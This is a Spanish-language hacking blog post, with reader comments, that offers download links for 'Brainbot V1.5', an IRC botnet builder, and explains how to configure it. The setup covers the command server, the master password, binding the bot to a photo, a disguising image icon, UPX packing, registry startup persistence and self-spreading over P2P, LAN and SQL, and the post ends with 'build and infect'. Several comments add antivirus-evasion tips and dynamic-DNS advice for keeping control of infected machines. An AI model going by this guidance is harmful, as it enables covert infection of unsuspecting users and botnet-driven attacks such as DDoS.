A pedido de los usuarios posteo este bot, es muy facil de configurar y es bastante estable, es con el bot que yo empese.
Una de sus mejores caracteristicas es su propia propagacion, tiene propagacion por p2p, irc, lan, y sql.
Incluye un binder, un compresor upx, posibildad de cambiar el icono y metodos de inicio.
Explico un poco como se configura:
Irc server:Aqui colocamos la direccion del servidor irc que utilizemos, recomiendo utilizar una cuenta no-ip o cdmon que redireccione al servidor para no perder los bot por si cierran el servidor o los banean, generalmente los banean muy rapido si tienen muchos bots, pueden buscar servidores irc en google.
Irc port: El puerto del servidor irc, generalmente 6667
Channel: Pongan el canal donde se conectaran los bot, por ejemplo #botnet
Fixed name: Los nick que tendran los bot cuando se conecten al servidor, por ejemplo Bot-
Masternick:
Esto es importante, es el nick que usaran ustedes para conectarse, es el que deben seleccionar en el cliente irc, si no se conectan con ese nick los bot no les daran bola. Ej: mauro892
Password: Su pasword para conectarse, es el que usaran para conectarse cuando introduscan el comando !login. Ej: 123465
Bind file: Seleccionamos el archivo con el que queremos juntar el bot, por ejemplo una foto.
Change icon: Seleccionamos el icono del bot, por ejemplo el de una imagen jpg
Upx: Marcamos para comprimir el bot
Startup: Introduciomos un nombre para una clave de registro (por ejemplo winr32), y el nombre del ejecutable para instalar en la carpeta de win (ej bootload)
Eso es todo lo basico para que el server funcione, ahora le damos build y a infectar, Despues explicare los metodos de spread para que el bot se propague.
Para ver los comandos del bot introducen !commands, en el cliente irc.
Tambien pueden leer el readme del archivo para ver las caracteristicas del bot, y para ver mas detalladamente como se introducen los comandos.
si tienen alguna duda con respecto a los comandos lo comentan aca y les contesto.
Descarga:
Brainbot V1.5 (megaupload)
Brainbot V1.5 (rapidshare)
Brainbot v1.5 (trojanfrance, sin dependencias)
Entradas
18 comentarios:
Mauro:
Seamos realistas, los ¿hackers? con algo de experiencia se nutren de foros encambio acá vienen los nuevos que quieren que le den de comer con una cuchara en la boca.
sin ánimo de ofender, me parece que los que visitan troyanosyvirus no están preparados para que les enseñes sobre botnets ya que todavía no tienen los códigos éticos que con el tiempo adquiere el que se mueve en este mundillo.
Muchas buenas páginas y foros estan hoy en día caidos por culpa de la proliferación de estas herramientas y vos lo que estás haciendo es contribuir a que los lamers jodan a gente bien intencionada que monta un foro para compartir su aficion.
Me da mucha pena la situación actual ya que visito unas 8 páginas de hack todos las semanas y siempre encuentro un par caíadas por ataques DDOS.
Ya te han llamado la atención gente de webs prestigiosas como http://elladodelmal.blogspot.com/2008/04/salvajes.html
y El Brujo de el hacker.net. Espero que retires esta información y recapacites por el bien de todos ya que estás escupiendo para arriba.
Porqué no se dejan de romper las pelotas con esos comentarios, no sé a ustedes, pero yo que he sacado muy buenos recursos de esta página me enferma que salten estos giles diciendo que los que la visitamos somos estúpidos?, perdón sabio!, hacker de los hackers!! pero yo defiendo que se comparta la información y el conocimiento..
AY ANONIMO QUE ETICA HACKER ME VAS A ROMPER EL CORAZON :( JAJAJAJAJAJA
VALE SIMPLEMENTE ES BUENA INFO Y SI NO LA ENCONTRAMOS ACA EN OTRO LADO LA VAN A ENCONTRAR O HASTA TU LA VAS A BRINDAR OK? SUERTE Y YA NO ME ROMPAS EL CORAZON CON TU ETICA HACKER JAJAJA....
anónimo tiene razón
Al bot lo envié a VT y lo detectan todos los AV.
Encriptado con Small Crypter lo detectan 17 y pronto lo detectarán todos.
Mauro, a ver de que te sirven los aduladores cuando te visite cana.
Gonza lo detectan por gente PENDEJA como tu cabron de meirda que manda todo a Vt!!!
por eso CHTPM gonza
este bot es viejisimo lo detectan hasta lo ciegos...
pero si le odifican los offsets se puede hacer muy indetectable ^^
son paginas de aprendizaje, nada +
El conocimiento debe de estar al alcance de todos.
al primer anonimo me pasa por los huevos lo q dijiste, no cambiare. no te borre el post porq me dio lastima no mas, vi q te demoraste mucho en escribir eso..
y por otro lado el bot es viejisimooo, es del 2004 pero funciona bien y es facil configurar, ademas son faciles de dejarlo indetectable.
perdon pero es cierto eso q digo mucha gente hace mierda los metodoz de encrptacon por q lo mandan a VT si fuera un bot nuevo y no lo detectaran todos los av ya empesarian a detectarlo te lo digo porq eh hecho pruebas
anonimo del ultimo tenes toda la razon, cuando suben los archivos a vt se envian las muestras a los labs y a los 2 dias ya lo detectan, yo nunca dije q no, yo le dije al anonimo del primer comentario.. eso es porq todos se ponen anonimos :S..
de todas formas siempre habra alguien q lo suba a vt, por eso existen las herramientas privadas
Hola MAURO!
COmo hago para redirigir los bots a mi no-ip? no se en que opcion ponerlo.
Gracias!
Yo tengo esa duda! es decir eso del no -ip no me quedo claro... respecto a este tema del bot
hola, es una gran pagina, no se porque hay gente que se queja de que mauro comparta la informacion con el resto del mundo
por cierto me lo detecta como troyano, se que ai k desactivar el AV para descargar hacks tools
pero mi inexperiencia me hace dudar de que no tenga nada >.<"
gracias
Mauro, soy miembro de FM-TEAM
(Fuck Microsoft Argentina) y estamos viendo la posibilidad de joinearte al grupo, agregame a im_ayronbot@hotmail.com para hablar del tema, saludos.
HOLA BUENAS LO PRIMERO AGRADECERTE ESTA WEB KE ES UN LUJO lo segundo preguntarte mira yo hago todos los pasos uno a uno y me da este error
rum time error "75"
path/file acces error
si pudieses ayudarme te lo agradeceria muchas gracias un saludo
andrea: usa cdmon, en la parte de dominio dinamico pone la direccion de tu servidor irc, y en el bot pone tu dominio cdmon..
---------
alcon: gracias y no te preocupes que el archivo esta limpio
--------
Eazy: agregado...
-----
Djvid: eso creo que se deve a que utilizas win vista u otro sistema operativo no compatible
Publicar un comentario en la entrada